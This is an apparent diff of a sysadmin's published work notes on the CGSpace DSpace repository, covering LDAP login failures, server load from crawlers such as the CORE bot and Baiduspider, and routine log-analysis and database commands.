<pre><code>2017-10-01 20:24:57,928 WARN org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=CA0AA5FEAEA8805645489404CDCE9594:ip_addr=41.204.190.40:ldap_attribute_lookup:type=failed_search javax.naming.CommunicationException\colon; svcgroot2.cgiarad.org\colon;3269 [Root exception is java.net.ConnectException\colon; Connection timed out (Connection timed out)]
<pre tabindex="0"><code>2017-10-01 20:24:57,928 WARN org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=CA0AA5FEAEA8805645489404CDCE9594:ip_addr=41.204.190.40:ldap_attribute_lookup:type=failed_search javax.naming.CommunicationException\colon; svcgroot2.cgiarad.org\colon;3269 [Root exception is java.net.ConnectException\colon; Connection timed out (Connection timed out)]
2017-10-01 20:22:37,982 INFO org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=CA0AA5FEAEA8805645489404CDCE9594:ip_addr=41.204.190.40:failed_login:no DN found for user pballantyne
</code></pre><ul>
<li>I thought maybe his account had expired (seeing as it&rsquo;s was the first of the month) but he says he was finally able to log in today</li>
<li>The logs for yesterday show fourteen errors related to LDAP auth failures:</li>
</ul>
<pre><code>$ grep -c &quot;ldap_authentication:type=failed_auth&quot; dspace.log.2017-10-01
<pre tabindex="0"><code>$ grep -c &#34;ldap_authentication:type=failed_auth&#34; dspace.log.2017-10-01
14
</code></pre><ul>
<li>For what it&rsquo;s worth, there are no errors on any other recent days, so it must have been some network issue on Linode or CGNET&rsquo;s LDAP server</li>
@ -152,7 +152,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>Communicate with Sam from the CGIAR System Organization about some broken links coming from their CGIAR Library domain to CGSpace</li>
<li>The first is a link to a browse page that should be handled better in nginx:</li>
</ul>
<pre><code>http://library.cgiar.org/browse?value=Intellectual%20Assets%20Reports&amp;type=subject → https://cgspace.cgiar.org/browse?value=Intellectual%20Assets%20Reports&amp;type=subject
<pre tabindex="0"><code>http://library.cgiar.org/browse?value=Intellectual%20Assets%20Reports&amp;type=subject → https://cgspace.cgiar.org/browse?value=Intellectual%20Assets%20Reports&amp;type=subject
</code></pre><ul>
<li>We&rsquo;ll need to check for browse links and handle them properly, including swapping the <code>subject</code> parameter for <code>systemsubject</code> (which doesn&rsquo;t exist in Discovery yet, but we&rsquo;ll need to add it) as we have moved their poorly curated subjects from <code>dc.subject</code> to <code>cg.subject.system</code></li>
<li>The second link was a direct link to a bitstream which has broken due to the sequence being updated, so I told him he should link to the handle of the item instead</li>
@ -165,7 +165,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>Twice in the past twenty-four hours Linode has warned that CGSpace&rsquo;s outbound traffic rate was exceeding the notification threshold</li>
<li>I had a look at yesterday&rsquo;s OAI and REST logs in <code>/var/log/nginx</code> but didn&rsquo;t see anything unusual:</li>
</ul>
<pre><code># awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 10
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 10
141 157.55.39.240
145 40.77.167.85
162 66.249.66.92
@ -176,7 +176,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
1495 50.116.102.77
3904 70.32.83.92
9904 45.5.184.196
# awk '{print $1}' /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
# awk &#39;{print $1}&#39; /var/log/nginx/oai.log.1 | sort -n | uniq -c | sort -h | tail -n 10
5 66.249.66.71
6 66.249.66.67
6 68.180.229.31
@ -225,7 +225,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>Delete Community 10568/102 (ILRI Research and Development Issues)</li>
<li>Move five collections to 10568/27629 (ILRI Projects) using <code>move-collections.sh</code> with the following configuration:</li>
</ul>
<pre><code>10568/1637 10568/174 10568/27629
<pre tabindex="0"><code>10568/1637 10568/174 10568/27629
10568/1642 10568/174 10568/27629
10568/1614 10568/174 10568/27629
10568/75561 10568/150 10568/27629
@ -270,14 +270,14 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>Annnd I reloaded the Atmire Usage Stats module and the connections shot back up and CGSpace went down again</li>
<li>Still not sure where the load is coming from right now, but it&rsquo;s clear why there were so many alerts yesterday on the 25th!</li>
</ul>
<pre><code># grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-25 | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2017-10-25 | sort -n | uniq | wc -l
18022
</code></pre><ul>
<li>Compared to other days there were two or three times the number of requests yesterday!</li>
</ul>
<pre><code># grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-23 | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2017-10-23 | sort -n | uniq | wc -l
3141
# grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2017-10-26 | sort -n | uniq | wc -l
# grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2017-10-26 | sort -n | uniq | wc -l
7851
</code></pre><ul>
<li>I still have no idea what was causing the load to go up today</li>
@ -302,7 +302,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>I&rsquo;m still not sure why this started causing alerts so repeatadely the past week</li>
<li>I don&rsquo;t see any tell tale signs in the REST or OAI logs, so trying to do rudimentary analysis in DSpace logs:</li>
</ul>
<pre><code># grep '2017-10-29 02:' dspace.log.2017-10-29 | grep -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep &#39;2017-10-29 02:&#39; dspace.log.2017-10-29 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
2049
</code></pre><ul>
<li>So there were 2049 unique sessions during the hour of 2AM</li>
@ -310,7 +310,7 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>I think I&rsquo;ll need to enable access logging in nginx to figure out what&rsquo;s going on</li>
<li>After enabling logging on requests to XMLUI on <code>/</code> I see some new bot I&rsquo;ve never seen before:</li>
</ul>
<pre><code>137.108.70.6 - - [29/Oct/2017:07:39:49 +0000] &quot;GET /discover?filtertype_0=type&amp;filter_relational_operator_0=equals&amp;filter_0=Internal+Document&amp;filtertype=author&amp;filter_relational_operator=equals&amp;filter=CGIAR+Secretariat HTTP/1.1&quot; 200 7776 &quot;-&quot; &quot;Mozilla/5.0 (compatible; CORE/0.6; +http://core.ac.uk; http://core.ac.uk/intro/contact)&quot;
<pre tabindex="0"><code>137.108.70.6 - - [29/Oct/2017:07:39:49 +0000] &#34;GET /discover?filtertype_0=type&amp;filter_relational_operator_0=equals&amp;filter_0=Internal+Document&amp;filtertype=author&amp;filter_relational_operator=equals&amp;filter=CGIAR+Secretariat HTTP/1.1&#34; 200 7776 &#34;-&#34; &#34;Mozilla/5.0 (compatible; CORE/0.6; +http://core.ac.uk; http://core.ac.uk/intro/contact)&#34;
</code></pre><ul>
<li>CORE seems to be some bot that is &ldquo;Aggregating the worlds open access research papers&rdquo;</li>
<li>The contact address listed in their bot&rsquo;s user agent is incorrect, correct page is simply: <a href="https://core.ac.uk/contact">https://core.ac.uk/contact</a></li>
@ -323,39 +323,39 @@ Add Katherine Lutz to the groups for content submission and edit steps of the CG
<li>Like clock work, Linode alerted about high CPU usage on CGSpace again this morning (this time at 8:13 AM)</li>
<li>Uptime Robot noticed that CGSpace went down around 10:15 AM, and I saw that there were 93 PostgreSQL connections:</li>
</ul>
<pre><code>dspace=# SELECT * FROM pg_stat_activity;
<pre tabindex="0"><code>dspace=# SELECT * FROM pg_stat_activity;
...
(93 rows)
</code></pre><ul>
<li>Surprise surprise, the CORE bot is likely responsible for the recent load issues, making hundreds of thousands of requests yesterday and today:</li>
</ul>
<pre><code># grep -c &quot;CORE/0.6&quot; /var/log/nginx/access.log
<pre tabindex="0"><code># grep -c &#34;CORE/0.6&#34; /var/log/nginx/access.log
26475
# grep -c &quot;CORE/0.6&quot; /var/log/nginx/access.log.1
# grep -c &#34;CORE/0.6&#34; /var/log/nginx/access.log.1
135083
</code></pre><ul>
<li>IP addresses for this bot currently seem to be:</li>
</ul>
<pre><code># grep &quot;CORE/0.6&quot; /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq
<pre tabindex="0"><code># grep &#34;CORE/0.6&#34; /var/log/nginx/access.log | awk &#39;{print $1}&#39; | sort -n | uniq
137.108.70.6
137.108.70.7
</code></pre><ul>
<li>I will add their user agent to the Tomcat Session Crawler Valve but it won&rsquo;t help much because they are only using two sessions:</li>
</ul>
<pre><code># grep 137.108.70 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq
<pre tabindex="0"><code># grep 137.108.70 dspace.log.2017-10-30 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq
session_id=5771742CABA3D0780860B8DA81E0551B
session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
</code></pre><ul>
<li>&hellip; and most of their requests are for dynamic discover pages:</li>
</ul>
<pre><code># grep -c 137.108.70 /var/log/nginx/access.log
<pre tabindex="0"><code># grep -c 137.108.70 /var/log/nginx/access.log
26622
# grep 137.108.70 /var/log/nginx/access.log | grep -c &quot;GET /discover&quot;
# grep 137.108.70 /var/log/nginx/access.log | grep -c &#34;GET /discover&#34;
24055
</code></pre><ul>
<li>Just because I&rsquo;m curious who the top IPs are:</li>
</ul>
<pre><code># awk '{print $1}' /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
496 62.210.247.93
571 46.4.94.226
651 40.77.167.39
@ -371,9 +371,9 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
<li>190.19.92.5 is apparently in Argentina, and 104.196.152.243 is from Google Cloud Engine</li>
<li>Actually, these two scrapers might be more responsible for the heavy load than the CORE bot, because they don&rsquo;t reuse their session variable, creating thousands of new sessions!</li>
</ul>
<pre><code># grep 190.19.92.5 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep 190.19.92.5 dspace.log.2017-10-30 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
1419
# grep 104.196.152.243 dspace.log.2017-10-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
# grep 104.196.152.243 dspace.log.2017-10-30 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
2811
</code></pre><ul>
<li>From looking at the requests, it appears these are from CIAT and CCAFS</li>
@ -382,11 +382,11 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
<li>Ah, wait, it looks like <code>crawlerIps</code> only came in 2017-06, so probably isn&rsquo;t in Ubuntu 16.04&rsquo;s 7.0.68 build!</li>
<li>That would explain the errors I was getting when trying to set it:</li>
</ul>
<pre><code>WARNING: [SetPropertiesRule]{Server/Service/Engine/Host/Valve} Setting property 'crawlerIps' to '190\.19\.92\.5|104\.196\.152\.243' did not find a matching property.
<pre tabindex="0"><code>WARNING: [SetPropertiesRule]{Server/Service/Engine/Host/Valve} Setting property &#39;crawlerIps&#39; to &#39;190\.19\.92\.5|104\.196\.152\.243&#39; did not find a matching property.
</code></pre><ul>
<li>As for now, it actually seems the CORE bot coming from 137.108.70.6 and 137.108.70.7 is only using a few sessions per day, which is good:</li>
</ul>
<pre><code># grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=137.108.70.(6|7)' dspace.log.2017-10-30 | sort -n | uniq -c | sort -h
<pre tabindex="0"><code># grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=137.108.70.(6|7)&#39; dspace.log.2017-10-30 | sort -n | uniq -c | sort -h
410 session_id=74F0C3A133DBF1132E7EC30A7E7E0D60:ip_addr=137.108.70.7
574 session_id=5771742CABA3D0780860B8DA81E0551B:ip_addr=137.108.70.7
1012 session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A:ip_addr=137.108.70.6
@ -399,7 +399,7 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
<li>Ask on the dspace-tech mailing list if it&rsquo;s possible to use an existing item as a template for a new item</li>
<li>To follow up on the CORE bot traffic, there were almost 300,000 request yesterday:</li>
</ul>
<pre><code># grep &quot;CORE/0.6&quot; /var/log/nginx/access.log.1 | awk '{print $1}' | sort -n | uniq -c | sort -h
<pre tabindex="0"><code># grep &#34;CORE/0.6&#34; /var/log/nginx/access.log.1 | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h
139109 137.108.70.6
139253 137.108.70.7
</code></pre><ul>
@ -408,7 +408,7 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
<li>I added <a href="https://goaccess.io/">GoAccess</a> to the list of package to install in the DSpace role of the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a></li>
<li>It makes it very easy to analyze nginx logs from the command line, to see where traffic is coming from:</li>
</ul>
<pre><code># goaccess /var/log/nginx/access.log --log-format=COMBINED
<pre tabindex="0"><code># goaccess /var/log/nginx/access.log --log-format=COMBINED
</code></pre><ul>
<li>According to Uptime Robot CGSpace went down and up a few times</li>
<li>I had a look at goaccess and I saw that CORE was actively indexing</li>
@ -416,7 +416,7 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
<li>I&rsquo;m really starting to get annoyed with these guys, and thinking about blocking their IP address for a few days to see if CGSpace becomes more stable</li>
<li>Actually, come to think of it, they aren&rsquo;t even obeying <code>robots.txt</code>, because we actually disallow <code>/discover</code> and <code>/search-filter</code> URLs but they are hitting those massively:</li>
</ul>
<pre><code># grep &quot;CORE/0.6&quot; /var/log/nginx/access.log | grep -o -E &quot;GET /(discover|search-filter)&quot; | sort -n | uniq -c | sort -rn
<pre tabindex="0"><code># grep &#34;CORE/0.6&#34; /var/log/nginx/access.log | grep -o -E &#34;GET /(discover|search-filter)&#34; | sort -n | uniq -c | sort -rn
158058 GET /discover
14260 GET /search-filter
</code></pre><ul>
@ -443,15 +443,15 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -15,7 +15,7 @@ The CORE developers responded to say they are looking into their bot not respect
Today there have been no hits by CORE and no alerts from Linode (coincidence?)
# grep -c &quot;CORE&quot; /var/log/nginx/access.log
# grep -c &#34;CORE&#34; /var/log/nginx/access.log
0
Generate list of authors on CGSpace for Peter to go through and correct:
@ -40,7 +40,7 @@ The CORE developers responded to say they are looking into their bot not respect
Today there have been no hits by CORE and no alerts from Linode (coincidence?)
# grep -c &quot;CORE&quot; /var/log/nginx/access.log
# grep -c &#34;CORE&#34; /var/log/nginx/access.log
0
Generate list of authors on CGSpace for Peter to go through and correct:
@ -48,7 +48,7 @@ Generate list of authors on CGSpace for Peter to go through and correct:
dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
COPY 54701
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -78,12 +78,12 @@ COPY 54701
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -129,7 +129,7 @@ COPY 54701
<p class="blog-post-meta">
<time datetime="2017-11-02T09:37:54+02:00">Thu Nov 02, 2017</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -142,12 +142,12 @@ COPY 54701
<ul>
<li>Today there have been no hits by CORE and no alerts from Linode (coincidence?)</li>
</ul>
<pre><code># grep -c &quot;CORE&quot; /var/log/nginx/access.log
<pre tabindex="0"><code># grep -c &#34;CORE&#34; /var/log/nginx/access.log
0
</code></pre><ul>
<li>Generate list of authors on CGSpace for Peter to go through and correct:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
COPY 54701
</code></pre><ul>
<li>Abenet asked if it would be possible to generate a report of items in Listing and Reports that had &ldquo;International Fund for Agricultural Development&rdquo; as the <em>only</em> investor</li>
@ -155,7 +155,7 @@ COPY 54701
<li>Work on making the thumbnails in the item view clickable</li>
<li>Basically, once you read the METS XML for an item it becomes easy to trace the structure to find the bitstream link</li>
</ul>
<pre><code>//mets:fileSec/mets:fileGrp[@USE='CONTENT']/mets:file/mets:FLocat[@LOCTYPE='URL']/@xlink:href
<pre tabindex="0"><code>//mets:fileSec/mets:fileGrp[@USE=&#39;CONTENT&#39;]/mets:file/mets:FLocat[@LOCTYPE=&#39;URL&#39;]/@xlink:href
</code></pre><ul>
<li>METS XML is available for all items with this pattern: /metadata/handle/10568/95947/mets.xml</li>
<li>I whipped up a quick hack to print a clickable link with this URL on the thumbnail but it needs to check a few corner cases, like when there is a thumbnail but no content bitstream!</li>
@ -177,7 +177,7 @@ COPY 54701
<li>It&rsquo;s the first time in a few days that this has happened</li>
<li>I had a look to see what was going on, but it isn&rsquo;t the CORE bot:</li>
</ul>
<pre><code># awk '{print $1}' /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
306 68.180.229.31
323 61.148.244.116
414 66.249.66.91
@ -191,7 +191,7 @@ COPY 54701
</code></pre><ul>
<li>138.201.52.218 is from some Hetzner server, and I see it making 40,000 requests yesterday too, but none before that:</li>
</ul>
<pre><code># zgrep -c 138.201.52.218 /var/log/nginx/access.log*
<pre tabindex="0"><code># zgrep -c 138.201.52.218 /var/log/nginx/access.log*
/var/log/nginx/access.log:24403
/var/log/nginx/access.log.1:45958
/var/log/nginx/access.log.2.gz:0
@ -202,7 +202,7 @@ COPY 54701
</code></pre><ul>
<li>It&rsquo;s clearly a bot as it&rsquo;s making tens of thousands of requests, but it&rsquo;s using a &ldquo;normal&rdquo; user agent:</li>
</ul>
<pre><code>Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
</code></pre><ul>
<li>For now I don&rsquo;t know what this user is!</li>
</ul>
@ -216,7 +216,7 @@ COPY 54701
<ul>
<li>But in the database the authors are correct (none with weird <code>, /</code> characters):</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue value where resource_type_id=2 and metadata_field_id=3 and text_value like 'International Livestock Research Institute%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue value where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;International Livestock Research Institute%&#39;;
text_value | authority | confidence
--------------------------------------------+--------------------------------------+------------
International Livestock Research Institute | 8f3865dc-d056-4aec-90b7-77f49ab4735c | 0
@ -240,7 +240,7 @@ COPY 54701
<li>Tsega had to restart Tomcat 7 to fix it temporarily</li>
<li>I will start by looking at bot usage (access.log.1 includes usage until 6AM today):</li>
</ul>
<pre><code># cat /var/log/nginx/access.log.1 | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log.1 | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
619 65.49.68.184
840 65.49.68.199
924 66.249.66.91
@ -254,7 +254,7 @@ COPY 54701
</code></pre><ul>
<li>104.196.152.243 seems to be a top scraper for a few weeks now:</li>
</ul>
<pre><code># zgrep -c 104.196.152.243 /var/log/nginx/access.log*
<pre tabindex="0"><code># zgrep -c 104.196.152.243 /var/log/nginx/access.log*
/var/log/nginx/access.log:336
/var/log/nginx/access.log.1:4681
/var/log/nginx/access.log.2.gz:3531
@ -268,64 +268,64 @@ COPY 54701
</code></pre><ul>
<li>This user is responsible for hundreds and sometimes thousands of Tomcat sessions:</li>
</ul>
<pre><code>$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
954
$ grep 104.196.152.243 dspace.log.2017-11-03 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 104.196.152.243 dspace.log.2017-11-03 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
6199
$ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
7051
</code></pre><ul>
<li>The worst thing is that this user never specifies a user agent string so we can&rsquo;t lump it in with the other bots using the Tomcat Session Crawler Manager Valve</li>
<li>They don&rsquo;t request dynamic URLs like &ldquo;/discover&rdquo; but they seem to be fetching handles from XMLUI instead of REST (and some with <code>//handle</code>, note the regex below):</li>
</ul>
<pre><code># grep -c 104.196.152.243 /var/log/nginx/access.log.1
<pre tabindex="0"><code># grep -c 104.196.152.243 /var/log/nginx/access.log.1
4681
# grep 104.196.152.243 /var/log/nginx/access.log.1 | grep -c -P 'GET //?handle'
# grep 104.196.152.243 /var/log/nginx/access.log.1 | grep -c -P &#39;GET //?handle&#39;
4618
</code></pre><ul>
<li>I just realized that <code>ciat.cgiar.org</code> points to 104.196.152.243, so I should contact Leroy from CIAT to see if we can change their scraping behavior</li>
<li>The next IP (207.46.13.36) seem to be Microsoft&rsquo;s bingbot, but all its requests specify the &ldquo;bingbot&rdquo; user agent and there are no requests for dynamic URLs that are forbidden, like &ldquo;/discover&rdquo;:</li>
</ul>
<pre><code>$ grep -c 207.46.13.36 /var/log/nginx/access.log.1
<pre tabindex="0"><code>$ grep -c 207.46.13.36 /var/log/nginx/access.log.1
2034
# grep 207.46.13.36 /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
# grep 207.46.13.36 /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
0
</code></pre><ul>
<li>The next IP (157.55.39.161) also seems to be bingbot, and none of its requests are for URLs forbidden by robots.txt either:</li>
</ul>
<pre><code># grep 157.55.39.161 /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
<pre tabindex="0"><code># grep 157.55.39.161 /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
0
</code></pre><ul>
<li>The next few seem to be bingbot as well, and they declare a proper user agent and do not request dynamic URLs like &ldquo;/discover&rdquo;:</li>
</ul>
<pre><code># grep -c -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1
<pre tabindex="0"><code># grep -c -E &#39;207.46.13.[0-9]{2,3}&#39; /var/log/nginx/access.log.1
5997
# grep -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c &quot;bingbot&quot;
# grep -E &#39;207.46.13.[0-9]{2,3}&#39; /var/log/nginx/access.log.1 | grep -c &#34;bingbot&#34;
5988
# grep -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
# grep -E &#39;207.46.13.[0-9]{2,3}&#39; /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
0
</code></pre><ul>
<li>The next few seem to be Googlebot, and they declare a proper user agent and do not request dynamic URLs like &ldquo;/discover&rdquo;:</li>
</ul>
<pre><code># grep -c -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1
<pre tabindex="0"><code># grep -c -E &#39;66.249.66.[0-9]{2,3}&#39; /var/log/nginx/access.log.1
3048
# grep -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c Google
# grep -E &#39;66.249.66.[0-9]{2,3}&#39; /var/log/nginx/access.log.1 | grep -c Google
3048
# grep -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
# grep -E &#39;66.249.66.[0-9]{2,3}&#39; /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
0
</code></pre><ul>
<li>The next seems to be Yahoo, which declares a proper user agent and does not request dynamic URLs like &ldquo;/discover&rdquo;:</li>
</ul>
<pre><code># grep -c 68.180.229.254 /var/log/nginx/access.log.1
<pre tabindex="0"><code># grep -c 68.180.229.254 /var/log/nginx/access.log.1
1131
# grep 68.180.229.254 /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
# grep 68.180.229.254 /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
0
</code></pre><ul>
<li>The last of the top ten IPs seems to be some bot with a weird user agent, but they are not behaving too well:</li>
</ul>
<pre><code># grep -c -E '65.49.68.[0-9]{3}' /var/log/nginx/access.log.1
<pre tabindex="0"><code># grep -c -E &#39;65.49.68.[0-9]{3}&#39; /var/log/nginx/access.log.1
2950
# grep -E '65.49.68.[0-9]{3}' /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
# grep -E &#39;65.49.68.[0-9]{3}&#39; /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
330
</code></pre><ul>
<li>Their user agents vary, ie:
@ -338,9 +338,9 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
<li>I&rsquo;ll just keep an eye on that one for now, as it only made a few hundred requests to dynamic discovery URLs</li>
<li>While it&rsquo;s not in the top ten, Baidu is one bot that seems to not give a fuck:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &quot;7/Nov/2017&quot; | grep -c Baiduspider
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;7/Nov/2017&#34; | grep -c Baiduspider
8912
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &quot;7/Nov/2017&quot; | grep Baiduspider | grep -c -E &quot;GET /(browse|discover|search-filter)&quot;
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;7/Nov/2017&#34; | grep Baiduspider | grep -c -E &#34;GET /(browse|discover|search-filter)&#34;
2521
</code></pre><ul>
<li>According to their documentation their bot <a href="http://www.baidu.com/search/robots_english.html">respects <code>robots.txt</code></a>, but I don&rsquo;t see this being the case</li>
@ -349,7 +349,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
<li>I should look in nginx access.log, rest.log, oai.log, and DSpace&rsquo;s dspace.log.2017-11-07</li>
<li>Here are the top IPs making requests to XMLUI from 2 to 8 AM:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
